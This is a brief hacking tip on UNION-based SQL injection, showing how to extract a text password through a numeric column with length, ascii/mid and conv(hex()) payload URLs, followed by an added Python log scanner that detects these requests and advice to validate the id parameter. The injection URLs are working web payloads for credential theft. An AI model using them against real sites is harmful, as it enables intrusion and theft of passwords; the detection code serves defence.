As everybody knows, in a union query the number of columns on both sides must be equal, and the types must be the same. So in an injection, if the preceding query returns a numeric type but we want to use the union query to obtain a password whose type is text, how should we handle it?
Actually, we can find out the password length first:
http://www.hacker.com/test.php?id=1%20and%201=2%20union%20select%20length(password)%20from%20test%23
The returned result is 8. OK, next:
http://www.hacker.com/test.php?id=1%20and%201=2%20union%20select%20ascii(mid(password,1,1))%20from%20test
The returned result is the ASCII code value of the first character of the password; then look up each character in turn and that is it.
However, we actually have a more convenient method, heh heh: one query is enough.
We submit:
http://www.hacker.com/test.php?id=1%20and%201=2%20union%20select%20conv(hex(password),16,10)%20from%20test
This returns 7017854418938247224. Converted to hexadecimal this is 0x61646D696E383838, which is the hexadecimal form of "admin888". I will not explain the principle; I trust everybody can work it out.
In my test, leaving out the conv function to convert the type gave a type mismatch; sweat, I do not know the reason.
OK! That is the end of my rambling.
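From the defender's side, the three requests above leave a recognisable trace in web server logs. The following added example (not code from the original article) scans access-log lines for a numeric parameter carrying a UNION SELECT together with the text-to-number functions used above; the log format, the `numeric_params` default and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed log lines (not real traffic); the test.php queries are the article's three URLs.
SAMPLE_LOG = [
    '10.0.0.5 "GET /test.php?id=1 HTTP/1.1" 200',
    '10.0.0.9 "GET /test.php?id=1%20and%201=2%20union%20select%20length(password)%20from%20test%23 HTTP/1.1" 200',
    '10.0.0.9 "GET /test.php?id=1%20and%201=2%20union%20select%20ascii(mid(password,1,1))%20from%20test HTTP/1.1" 200',
    '10.0.0.9 "GET /test.php?id=1%20and%201=2%20union%20select%20conv(hex(password),16,10)%20from%20test HTTP/1.1" 200',
    '10.0.0.7 "GET /news.php?title=trade%20union%20vote HTTP/1.1" 200',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b")
# Functions the article uses to squeeze a text column through a numeric result column.
HELPER_RE = re.compile(r"\b(length|ascii|mid|conv|hex)\s*\(")


def findings(line, numeric_params=("id",)):
    """Return the reasons one logged request resembles the union queries above."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    reasons = []
    query = urlsplit(match.group(1)).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        # parse_qsl has already URL-decoded the value; collapse whitespace and case.
        value = re.sub(r"\s+", " ", raw).strip().lower()
        # A parameter the application treats as a number should contain only digits.
        if name in numeric_params and not value.isdigit():
            reasons.append(f"{name}: non-numeric value")
        if UNION_RE.search(value):
            reasons.append(f"{name}: UNION SELECT")
            helpers = sorted(set(HELPER_RE.findall(value)))
            if helpers:
                reasons.append(f"{name}: text-to-number helpers {', '.join(helpers)}")
    return reasons


def scan(lines):
    """Map the index of each suspicious line to its list of reasons."""
    return {i: r for i, line in enumerate(lines) if (r := findings(line))}


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_LOG).items():
        print(index, reasons)
```

The first check is also the fix on the application side: if `id` is validated as an integer or bound as a query parameter before it reaches the SQL statement, none of the three requests changes the query.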